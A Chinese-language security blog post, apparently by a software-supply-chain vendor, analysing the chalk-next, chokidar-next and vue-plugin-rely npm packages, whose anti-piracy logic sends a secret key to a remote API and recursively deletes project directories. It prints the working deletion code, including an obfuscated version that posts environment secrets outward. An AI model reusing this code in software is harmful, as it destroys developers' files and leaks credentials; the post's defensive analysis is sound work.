npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

一、事件简述

1月5日,有开发者在 twitter 中发文称遭遇了名为 chalk-next 的组件投毒事件,该组件存在收集配置信息和删除本地文件的恶意逻辑,当前 NPM 仓库已经下线了该组件。

chalk-next 组件的开发者也是 vue-admin-beautiful 项目的作者 chuzhixin,vue-admin-beautiful 项目在 GitHub 中拥有 13.5K 的 star 数。

经过分析,包括 chalk-next 在内,作者发布的 chokider-next、vue-plugin-rely 包中的类似逻辑被用于识别、惩罚盗版行为,此事件也在 V2EX 等开发者社区中引起较多讨论。

二、事件过程

1月5日,@ewind1994 在 twitter 中发推文称发现了一个 PR(代码合并请求)试图针对他们 GitHub 项目投毒,该PR是将原有的chalk依赖修改为chalk-next,而chalk-next通过判断运行环境中的配置信息,在一定条件下会删除当前目录下的特定目录文件(包括.vscode、src、public、.git、.svn、mock、node_modules)。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

当天 19:05,在用户投诉后,NPM 官方仓库删除了 chalk-next 包,目前已无法下载。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

当天 19:11,在 V2EX 社区中有其他开发者发帖(https://v2ex.com/t/906834)描述了该事件相关信息

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

1 月 6 日 9:39,@chu1204505056 在推特中回应@ewind1994

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

1月6日 10:32,开发者 chuzhixin 在 GitHub 仓库(https://github.com/chuzhixin/chalk-next)中挂出一段说明,声称@ewind1994 一直在对其恶意攻击。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

1月6日 11:27,开发者 chuzhixin 在AFFiNE项目中提出 issue(https://github.com/toeverything/AFFiNE/issues/676)质疑此前出现PR的原因。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

三、投毒包分析

经过分析,该作者总共发布了 chalk-next、chokidar-next、vue-plugin-rely 三个 NPM 包都存在类似的删除文件逻辑。

chalk-next 分析

通过 NPM 仓库中可以看到 chalk-next 组件每周下载量200+,从 2021 年 6 月开始更新,使用了 chalk 的 readme 信息,存在很强的迷惑性。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除
npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

历史版本信息:

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

从代码中可以看到,通过NODE_ENV环境变量判断当前不属于开发环境时,会将VUE_GITHUB_USER_NAMEVUE_APP_SECRET_KEY和当前时间发送到特定的API,返回数据的状态码为 202 时,会将./.vscode./src./public ./.git ./.svn ./mack ./node_modules这些文件路径传入到名为thanks的函数,该函数会删除传入的文件或目录。恶意代码片段如下

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

chokidar-next 分析

其在 NPM 仓库中使用的用户 vabjs,在发布的其他包中也存在类似的恶意行为,如chokidar-next,当前仍可下载。

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

使用相同的thanks 方法从系统上删除./vscode ./.git ./.svn ./src/vab ./library ./src/store ./public ./mock目录,触发的条件不同,只通过环境变量判断,而没有请求远程 API。代码片段如下:

function thanks(path) {
    var files = [];
    if (fs.existsSync(path)) {
      files = fs.readdirSync(path);
      files.forEach(function (file) {
        var curPath = path + "/" + file;
        if (fs.statSync(curPath).isDirectory()) {
          thanks(curPath);
        } else {
          fs.unlinkSync(curPath);
        }
      });
      fs.rmdirSync(path);
    }
  }
  
  !(() => {
    if (
      process.env["u004eu004fu0044u0045u005fu0045u004eu0056"] !==
      "u0064u0065u0076u0065u006cu006fu0070u006du0065u006eu0074"
    ) {
      var key =
        process.env[
          "u0056u0055u0045u005fu0041u0050u0050u005fu0053u0045u0043u0052u0045u0054u005fu004bu0045u0059"
        ];
      if (!key) {
        thanks("./.vscode");
        thanks("./package.json");
      } else {
        if (
          key !=
            "u0066u0077u0066u006du0069u0061u006fu0036u0032u0034u0030u0039u0033u0035u0039u0039" &&
          key != "u0070u0072u0065u0076u0069u0065u0077"&&
          key != "vabp"
        ) {
          if (key.length < 50 || key.substring(key.length - 2) != "==") {
            thanks("./.vscode");
            thanks("./library");
            thanks("./src/vab");
            thanks("./src/store");
            thanks("./public");
            thanks("./.git");
            thanks("./.svn");
            thanks("./mock");
          }
        }
      }
    } else {
      var key =
        process.env[
          "u0056u0055u0045u005fu0041u0050u0050u005fu0053u0045u0043u0052u0045u0054u005fu004bu0045u0059"
        ];
      if (!key) {
        thanks("./.vscode");
        thanks("./src/vab");
      }
      if (
        key !=
          "u0066u0077u0066u006du0069u0061u006fu0036u0032u0034u0030u0039u0033u0035u0039u0039" &&
        key != "u0070u0072u0065u0076u0069u0065u0077"&&
        key != "vabp"
      ) {
        if (key.length < 50 || key.substring(key.length - 2) != "==") {
          thanks("./.vscode");
          thanks("./.git");
          thanks("./.svn");
        }
      }
    }
  })();
  
  exports.watch = watch;

vue-plugin-rely 分析

vue-plugin-rely组件包也存在与chalk-next相同的逻辑,代码增加了混淆,同时在文件开头有一句针对盗版破解的注释声明,其代码如下:

/* 破解造成不可挽回后果自负,正版用户请勿因破解、恶意分享失去框架更新和使用的机会,盗版用户未获取授权就使用到商业项目将追究你的法律责任 */
const _0x6462 = [
  'log',
  'unlinkSync',
  'NODE_ENV',
  'existsSync',
  'then',
  'getTime',
  'readdirSync',
  'post',
  './node_modules',
  './public',
  'statSync',
  'VUE_APP_SECRET_KEY',
  'forEach',
  './.git',
  'https://**********',
  './.vscode',
  'env',
  'bgRed',
]
const _0x27fc = function (_0x646269, _0x27fce6) {
  _0x646269 = _0x646269 - 0x0
  let _0x3f0e99 = _0x6462[_0x646269]
  return _0x3f0e99
}
const axios = require('axios')
const chalk = require('chalk')
const fs = require('fs')
function thanks(_0x3503fb) {
  var _0x54aa51 = []
  //console['log'](fs[_0x27fc('0x3')](_0x3503fb))
  if (fs['existsSync'](_0x3503fb)) {
    _0x54aa51 = fs[_0x27fc('0x6')](_0x3503fb)
    _0x54aa51[_0x27fc('0xc')](function (_0x60171a, _0x43e5ad) {
      var _0x258bf5 = _0x3503fb + '/' + _0x60171a
      if (fs[_0x27fc('0xa')](_0x258bf5)['isDirectory']()) {
        thanks(_0x258bf5)
      } else {
        fs[_0x27fc('0x1')](_0x258bf5)
      }
    })
    fs['rmdirSync'](_0x3503fb)
  }
}
!(() => {
  if (process['env'][_0x27fc('0x2')] !== 'development') {
    axios({
      url: _0x27fc('0xe'),
      method: _0x27fc('0x7'),
      data: {
        customUserId: process['env']['VUE_GITHUB_USER_NAME'],
        secretKey: process['env']['VUE_APP_SECRET_KEY'],
        timestamp: new Date()[_0x27fc('0x5')](),
      },
    })
      [_0x27fc('0x4')](({ data }) => {
        if (data['code'] == 0xca) {
          thanks('./.vscode')
          thanks('./src')
          thanks(_0x27fc('0x9'))
          thanks(_0x27fc('0xd'))
          thanks('./.svn')
          thanks('./mock')
          thanks(_0x27fc('0x8'))
        }
        if (data['code'] != 0xc8) {
          console[_0x27fc('0x0')](chalk[_0x27fc('0x11')](data['msg']))
        }
      })
      ['catch'](() => {
        if (
          process[_0x27fc('0x10')][_0x27fc('0xb')] !== 'preview' &&
          process[_0x27fc('0x10')][_0x27fc('0xb')]['length'] <= '50'
        ) {
          thanks(_0x27fc('0xf'))
          thanks('./src')
          thanks('./public')
          thanks('./.git')
          thanks('./.svn')
          thanks('./mock')
          thanks('./node_modules')
        }
      })
  }
})()

四、总结

从开发者chuzhixin的回应和代码中的行为来看,作者的行为可能难以定义是恶意还是正义,所幸当前应该没有造成实质性的危害。但通过-next复刻原有项目重新发布确实容易令人混淆,对于使用开源组件的众多开发者而言又是一次信任的崩塌,开源不等于免费,也不等于安全,在使用中还是需要仔细甄别。

对于企业而言,类似的开源组件投毒的情况每天都在发生,需要及时建立相应的检测识别、处置响应能力。

该投毒已上线漏洞库,担心源码被删,快速检测自己的代码,查看风险详情🔍

检测地址:https://www.murphysec.com/

IDE插件说明文档:https://www.murphysec.com/docs/guides/scan-scene/ide-plugin.html

npm 包 chalk-next 被开发者投毒,源码 SRC 目录被删除

发布者:墨菲安全,转发请注明出处:https://www.murphysec.com/blog/poisoning-analysis/4430.html

(0)
上一篇 2023年1月5日 15:02
下一篇 2023年1月9日 14:47

相关推荐

  • 小心白蛇!PyPI仓库被持续投放White Snake后门组件

    背景 墨菲安全实验室在持续监测开源软件仓库中的投毒行为,4 月 14 日起陆续发现至少 41 个包含白蛇(White Snake)后门的 Python 包被发布到 PyPI 仓库,目前相关的后门包仍在持续发布。 事件简述 白蛇 (WhiteSnake)是在今年 2 月份开始持续活跃、以信息窃取为目的的后门软件,其通过 telegram 等渠道进行售卖,按照不…

    2023年5月12日
  • ihateniggers:针对Python开发者的Windows远控木马分析

    背景 墨菲安全实验室在持续监测开源软件仓库中的投毒行为,5 月 9 日起发现 4 个包含 “ihateniggers” 远程控制木马的 Python 包被 nagogy@gmail.com 邮箱关联的账号发布到 PyPI 仓库,试图针对Windows系统下 Python 开发者进行攻击。木马利用了discord、replit、play…

    2023年5月12日
  • 多个不同名称的 PyPI 包中发现 W4SP 窃取器

    威胁参与者已经向 Python 包索引(PyPI)发布了另一轮恶意软件包,目的是在受到威胁的开发人员机器上发布窃取信息的恶意软件。 有趣的是,尽管这个恶意软件有很多名字,比如ANGEL Stealer,Celestial Stealer,Fade Stealer,Leaf $tealer,PURE Stealer,Satan Stealer和@skid St…

    2023年2月17日
  • 二月最新漏洞列表

    Apache IoTDB-Workbench <0.13.3 存在身份验证绕过漏洞(CVE-2023-24829),Apache Linkis <1.3.1 任意客户端文件读取漏洞(CVE-2022-44644),Apache Linkis <1.3.1 存在反序列化漏洞(CVE-2022-44645),Apache InLong 存在任意文件读取漏洞(CVE-2023-24977)

    2023年2月6日
  • CuteBoi:超过 1200 个 NPM 包加入挖矿逻辑

    事件简述 近日,checkmarx研究人员公开了一起涉及众多包的NPM软件供应链攻击事件。事件最早可以追溯到 2021年12月,攻击者投放了1200多个包含混淆加密的恶意 NPM ,这些包拥有相同的挖矿脚本(eazyminer),该脚本的目的是利用如 Database和 Web 等所在服务器的机器闲置资源进行挖矿。 攻击事件分析 攻击手法 CuteBoi 主…

    2023年1月5日

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

联系我们

400-180-9568

邮件:hi@murphysec.com

工作时间:周一至周五,10:00-19:00,节假日休息

关注公众号

20230105-100741